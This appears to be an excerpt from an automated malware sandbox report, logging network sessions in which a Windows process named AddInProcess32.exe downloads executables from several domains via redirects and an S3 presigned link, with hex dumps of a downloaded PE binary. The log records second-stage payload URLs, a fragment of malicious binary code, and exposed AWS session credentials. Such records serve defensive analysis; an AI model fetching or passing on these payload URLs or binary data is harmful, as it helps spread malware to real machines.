                                                                                                                                                                                                                                                            Data Ascii: e1b<!DOCTYPE html><html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> ... CSRF Token --> <meta name="csrf-token" content="
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC1369INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 6f 72 74 69 6e 79 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 47 6f 20 62 61 63 6b 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 66 6f 6f 74 65 72 20 69 64 3d 22 66 6f 6f 74 65 72 22 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 20 62 67 2d 62 61 73 65 2d 30 20 64 2d 70 72 69 6e 74 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72
                                                                                                                                                                                                                                                            Data Ascii: <a href="https://shortiny.com" class="btn btn-primary">Go back</a> </div> </div> </div> </div></div> <footer id="footer" class="footer bg-base-0 d-print-none"> <div class="container
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC880INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 69 78 65 64 2d 62 6f 74 74 6f 6d 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 2d 30 20 6d 74 2d 30 20 6d 72 2d 33 20 6d 62 2d 33 20 6d 6c 2d 33 20 70 2d 32 20 72 6f 75 6e 64 65 64 20 63 6f 6f 6b 69 65 2d 62 61 6e 6e 65 72 20
                                                                                                                                                                                                                                                            Data Ascii: </div> </div> </div> <div class="fixed-bottom pointer-events-none"> <div class="d-flex justify-content-center align-items-center"> <div class="border-0 mt-0 mr-3 mb-3 ml-3 p-2 rounded cookie-banner
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 1
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            55192.168.2.555631104.21.32.14244344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC79OUTGET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: shipofdestiny.com
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC705INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bdjtJTyyykrXTOY0s5auBQBpE7Wykc%2F0Q6sxQ6AmNC433J%2Fb%2BCOkAjpSwVfW0SK89JHW6HN0nQtRWflq9%2BT1p5XTmKbFQFn1q3yPb1A2D9TK1OVhioNvXC315HU08y6o5GIv%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820340b5e0ad7-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC135INData Raw: 38 31 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 61 77 79 65 72 62 75 79 65 72 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            56192.168.2.555632172.67.178.18344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC74OUTGET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: namemail.org
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC693INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JAntoR3PkFDCrr1EI6QP%2B1QqwEbz87hKD3woQF899P07z%2F%2BpzveyTRtNFUHGvm6kUrr2OrFuJ%2BiGkbpRUMTyG6uXZHJWHSJ4M6WWcxYj5tj52tIbzD%2B5nDMg%2F8V71sg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820352fbf09fd-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC131INData Raw: 37 64 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 74 72 61 64 65 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 7d<a href="https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            57192.168.2.5556363.5.20.20944344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1119OUTGET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1
                                                                                                                                                                                                                                                            Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC548INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            x-amz-id-2: +rTpzE++1U0ad6TJZrGhHh/4498R/ZvI4wNqWRR7KA/u3dHpiE7o5yVI54zdMIlqBbsWyylODfigV1dBqLCZuw==
                                                                                                                                                                                                                                                            x-amz-request-id: 9XXWF337X59ZR7K9
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:02 GMT
                                                                                                                                                                                                                                                            Last-Modified: Sat, 09 Mar 2024 01:51:54 GMT
                                                                                                                                                                                                                                                            ETag: "d9578a8e9ee343bc53b08fd8101f66e9"
                                                                                                                                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                            x-amz-version-id: P5m1d1MT8MpyYgT1paykScDnj4a0CXh_
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="a02.exe"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Server: AmazonS3
                                                                                                                                                                                                                                                            Content-Length: 323584
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1410INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 08 61 dd 66 4c 00 b3 35 4c 00 b3 35 4c 00 b3 35 cf 08 ee 35 4e 00 b3 35 6b c6 ce 35 58 00 b3 35 6b c6 de 35 26 00 b3 35 6b c6 dd 35 60 00 b3 35 8f 0f ee 35 43 00 b3 35 4c 00 b2 35 cb 00 b3 35 6b c6 c1 35 4a 00 b3 35 6b c6 cb 35 4d 00 b3 35 52 69 63 68 4c 00 b3 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 3f be eb 65 00 00 00 00 00 00 00 00 e0 00 03
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$afL5L5L55N5k5X5k5&5k5`55C5L55k5J5k5M5RichL5PEL?e
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1024INData Raw: 85 c0 56 8b f1 c6 46 0c 00 75 63 e8 2a 22 00 00 89 46 08 8b 48 6c 89 0e 8b 48 68 89 4e 04 8b 0e 3b 0d 48 cd 44 00 74 12 8b 0d 64 cc 44 00 85 48 70 75 07 e8 98 61 00 00 89 06 8b 46 04 3b 05 68 cb 44 00 74 16 8b 46 08 8b 0d 64 cc 44 00 85 48 70 75 08 e8 67 5a 00 00 89 46 04 8b 46 08 f6 40 70 02 75 14 83 48 70 02 c6 46 0c 01 eb 0a 8b 08 89 0e 8b 40 04 89 46 04 8b c6 5e c2 04 00 f6 41 0c 40 74 06 83 79 08 00 74 24 ff 49 04 78 0b 8b 11 88 02 ff 01 0f b6 c0 eb 0c 0f be c0 51 50 e8 f8 fd ff ff 59 59 83 f8 ff 75 03 09 06 c3 ff 06 c3 55 8b ec 56 8b f0 eb 13 8b 4d 10 8a 45 08 ff 4d 0c e8 b7 ff ff ff 83 3e ff 74 06 83 7d 0c 00 7f e7 5e 5d c3 f6 47 0c 40 53 56 8b f0 8b d9 74 34 83 7f 08 00 75 2e 8b 44 24 0c 01 06 eb 2d 8a 03 ff 4c 24 0c 8b cf e8 82 ff ff ff 43 83 3e
                                                                                                                                                                                                                                                            Data Ascii: VFuc*"FHlHhN;HDtdDHpuaF;hDtFdDHpugZFF@puHpF@F^A@tyt$IxQPYYuUVMEM>t}^]G@SVt4u.D$-L$C>
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC15360INData Raw: 75 11 43 43 81 4d e8 00 80 00 00 89 5d b8 e9 29 06 00 00 3c 33 75 17 80 7b 01 32 75 11 43 43 81 65 e8 ff 7f ff ff 89 5d b8 e9 0e 06 00 00 3c 64 0f 84 06 06 00 00 3c 69 0f 84 fe 05 00 00 3c 6f 0f 84 f6 05 00 00 3c 75 0f 84 ee 05 00 00 3c 78 0f 84 e6 05 00 00 3c 58 0f 84 de 05 00 00 89 75 8c 8d 45 9c 50 0f b6 c2 50 89 75 bc e8 6e 5f 00 00 59 85 c0 8a 45 e7 59 74 19 8b 4d d0 8d 75 cc e8 f9 fb ff ff 8a 03 43 84 c0 89 5d b8 0f 84 c2 05 00 00 8b 4d d0 8d 75 cc e8 e0 fb ff ff e9 99 05 00 00 0f be c2 83 f8 64 0f 8f 72 01 00 00 0f 84 eb 01 00 00 83 f8 53 0f 8f ab 00 00 00 74 5a 83 e8 41 74 10 48 48 74 40 48 48 74 08 48 48 0f 85 4f 04 00 00 80 c2 20 c7 45 88 01 00 00 00 88 55 e7 83 4d e8 40 39 75 e0 8d 5d ec b8 00 02 00 00 89 5d dc 89 45 98 0f 8d c7 01 00 00 c7 45
                                                                                                                                                                                                                                                            Data Ascii: uCCM])<3u{2uCCe]<d<i<o<u<x<XuEPPun_YEYtMuC]MudrStZAtHHt@HHtHHO EUM@9u]]EE
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC16384INData Raw: c3 6a 08 68 b0 aa 44 00 e8 05 d8 ff ff 8b 4d 08 85 c9 74 2a 81 39 63 73 6d e0 75 22 8b 41 1c 85 c0 74 1b 8b 40 04 85 c0 74 14 83 65 fc 00 50 ff 71 18 e8 2c af ff ff c7 45 fc fe ff ff ff e8 14 d8 ff ff c3 33 c0 38 45 0c 0f 95 c0 c3 8b 65 e8 e9 43 0a 00 00 8b 4c 24 08 8b 01 56 8b 74 24 08 03 c6 83 79 04 00 7c 10 8b 51 04 8b 49 08 8b 34 32 8b 0c 0e 03 ca 03 c1 5e c3 55 8b ec 83 ec 0c 85 ff 75 0a e8 5b 0a 00 00 e9 0a 0a 00 00 83 65 f8 00 83 3f 00 c6 45 ff 00 7e 53 53 56 8b 45 08 8b 40 1c 8b 40 0c 8b 18 85 db 8d 70 04 7e 33 8b 45 f8 c1 e0 04 89 45 f4 8b 4d 08 ff 71 1c 8b 06 50 8b 47 04 03 45 f4 50 e8 6e fd ff ff 83 c4 0c 85 c0 75 0a 4b 83 c6 04 85 db 7f dc eb 04 c6 45 ff 01 ff 45 f8 8b 45 f8 3b 07 7c b1 5e 5b 8a 45 ff c9 c3 6a 04 b8 33 dc 40 00 e8 2e b2 ff ff
                                                                                                                                                                                                                                                            Data Ascii: jhDMt*9csmu"At@tePq,E38EeCL$Vt$y|QI42^Uu[e?E~SSVE@@p~3EEMqPGEPnuKEEE;|^[Ej3@.
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1024INData Raw: 00 77 16 e8 b6 13 00 00 8b fc 3b fb 74 dd c7 07 cc cc 00 00 83 c7 08 eb 1a 50 e8 93 66 ff ff 3b c3 59 74 09 c7 00 dd dd 00 00 83 c0 08 8b f8 eb 02 33 ff 3b fb 74 b4 ff 75 f8 53 57 e8 1d 78 ff ff 83 c4 0c ff 75 f8 57 ff 75 14 ff 75 f4 ff 75 0c ff 75 08 ff d6 3b c3 89 45 f8 75 04 33 f6 eb 25 ff 75 1c 8d 45 f8 ff 75 18 50 57 ff 75 20 ff 75 ec e8 8b 11 00 00 8b f0 89 75 f0 83 c4 18 f7 de 1b f6 23 75 f8 57 e8 95 fc ff ff 59 eb 1a ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 ff 15 90 e0 40 00 8b f0 39 5d f4 74 09 ff 75 f4 e8 1f 65 ff ff 59 8b 45 f0 3b c3 74 0c 39 45 18 74 07 50 e8 0c 65 ff ff 59 8b c6 8d 65 e0 5f 5e 5b 8b 4d fc 33 cd e8 4d 61 ff ff c9 c3 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 0d 7f ff ff ff 75 28 8d 4d f0 ff 75 24 ff 75 20 ff 75 1c ff
                                                                                                                                                                                                                                                            Data Ascii: w;tPf;Yt3;tuSWxuWuuuu;Eu3%uEuPWu uu#uWYuuuuuu@9]tueYE;t9EtPeYe_^[M3MaUuMu(Mu$u u
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC16384INData Raw: ff 76 6c e8 cd 61 ff ff ff 76 70 e8 c5 61 ff ff ff 76 74 e8 bd 61 ff ff ff 76 78 e8 b5 61 ff ff ff 76 7c e8 ad 61 ff ff 83 c4 40 ff b6 80 00 00 00 e8 9f 61 ff ff ff b6 84 00 00 00 e8 94 61 ff ff ff b6 88 00 00 00 e8 89 61 ff ff ff b6 8c 00 00 00 e8 7e 61 ff ff ff b6 90 00 00 00 e8 73 61 ff ff ff b6 94 00 00 00 e8 68 61 ff ff ff b6 98 00 00 00 e8 5d 61 ff ff ff b6 9c 00 00 00 e8 52 61 ff ff ff b6 a0 00 00 00 e8 47 61 ff ff ff b6 a4 00 00 00 e8 3c 61 ff ff ff b6 a8 00 00 00 e8 31 61 ff ff 83 c4 2c 5e c3 56 8b 74 24 08 85 f6 74 35 8b 06 3b 05 60 ce 44 00 74 07 50 e8 13 61 ff ff 59 8b 46 04 3b 05 64 ce 44 00 74 07 50 e8 01 61 ff ff 59 8b 76 08 3b 35 68 ce 44 00 74 07 56 e8 ef 60 ff ff 59 5e c3 56 8b 74 24 08 85 f6 74 7e 8b 46 0c 3b 05 6c ce 44 00 74 07 50 e8
                                                                                                                                                                                                                                                            Data Ascii: vlavpavtavxav|a@aaa~asaha]aRaGa<a1a,^Vt$t5;`DtPaYF;dDtPaYv;5hDtV`Y^Vt$t~F;lDtP
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1024INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC16384INData Raw: 38 89 44 24 3c 89 44 24 40 89 44 24 44 ff d7 8d 4c 24 28 51 8d 54 24 3c 52 55 55 6a 04 55 55 8b d8 8b 84 24 a0 00 00 00 55 50 55 c7 03 07 00 01 00 89 6c 24 38 ff 15 d8 00 41 00 85 c0 75 13 ff 15 d4 00 41 00 c7 44 24 10 01 00 00 00 e9 9e 01 00 00 8b 4c 24 30 51 68 20 1c 41 00 e8 ea 40 00 00 83 c4 08 6a 04 68 00 30 00 00 68 00 70 00 00 55 ff d7 68 00 70 00 00 8b f0 68 f8 1e 41 00 56 e8 91 77 00 00 8b 54 24 38 8b 7e 3c 83 c4 0c 53 52 03 fe ff 15 10 02 41 00 8b 83 a4 00 00 00 83 c0 08 50 68 24 1c 41 00 e8 9e 40 00 00 8b 93 a4 00 00 00 8b 44 24 30 83 c4 08 55 6a 04 8d 4c 24 1c 51 83 c2 08 52 50 ff 15 0c 02 41 00 8b 4c 24 14 51 68 24 1c 41 00 e8 6f 40 00 00 8b 44 24 1c 8d 6f 34 83 c4 08 3b 45 00 89 6c 24 20 75 0c 8b 54 24 28 50 52 ff 15 1c 02 41 00 8b 47 50 8b
                                                                                                                                                                                                                                                            Data Ascii: 8D$<D$@D$DL$(QT$<RUUjUU$UPUl$8AuAD$L$0Qh A@jh0hpUhphAVwT$8~<SRAPh$A@D$0UjL$QRPAL$Qh$Ao@D$o4;El$ uT$(PRAGP
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1024INData Raw: 44 24 0c 8b 08 8d 54 24 18 52 8d 54 24 20 52 50 8b 41 0c ff d0 85 c0 0f 8c d7 00 00 00 68 b0 94 41 00 e8 4a 08 00 00 6a 30 8d 4c 24 28 6a 00 51 e8 31 32 00 00 8b 44 24 28 be 01 00 00 00 83 c4 10 8d 4c 24 20 66 89 74 24 28 66 89 74 24 26 66 c7 44 24 24 cf 07 66 c7 44 24 20 30 00 66 c7 44 24 30 0d 00 c7 44 24 40 07 00 00 00 66 89 74 24 44 8b 10 8b 52 0c 51 50 ff d2 85 c0 7c 6a 68 18 95 41 00 e8 e9 07 00 00 8b 44 24 10 8b 08 83 c4 04 8d 54 24 10 52 68 80 02 41 00 50 8b 01 ff d0 85 c0 7c 44 68 98 95 41 00 e8 c3 07 00 00 8b 44 24 14 8b 08 8b 51 18 83 c4 04 56 6a 00 50 ff d2 68 00 96 41 00 e8 a7 07 00 00 68 74 96 41 00 e8 9d 07 00 00 8b 44 24 18 8b 08 8b 51 08 83 c4 08 50 c6 44 24 0f 01 ff d2 8b 44 24 18 8b 08 8b 51 08 50 ff d2 8b 44 24 0c 8b 08 8b 51 08 50 ff
                                                                                                                                                                                                                                                            Data Ascii: D$T$RT$ RPAhAJj0L$(jQ12D$(L$ ft$(ft$&fD$$fD$ 0fD$0D$@ft$DRQP|jhAD$T$RhAP|DhAD$QVjPhAhtAD$QPD$D$QPD$QP


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            58192.168.2.555637104.21.63.7144344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC110OUTGET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: lawyerbuyer.org
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC678INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:01 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283792
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:53:03 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 5
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CIV5WCPcUh5aOPHYaQ9ASUfgKEEMGo2I3R8UqGPWRVPMlhCCFgiIN2cikJ4Iaxc3wmt%2FTMzHpNsvqMuTpOxzHY2eg%2FIChnAjv5lWhn0gus0O6KcNlvRv2WoceV4o3Vj5lJA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628203aefce0ad5-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
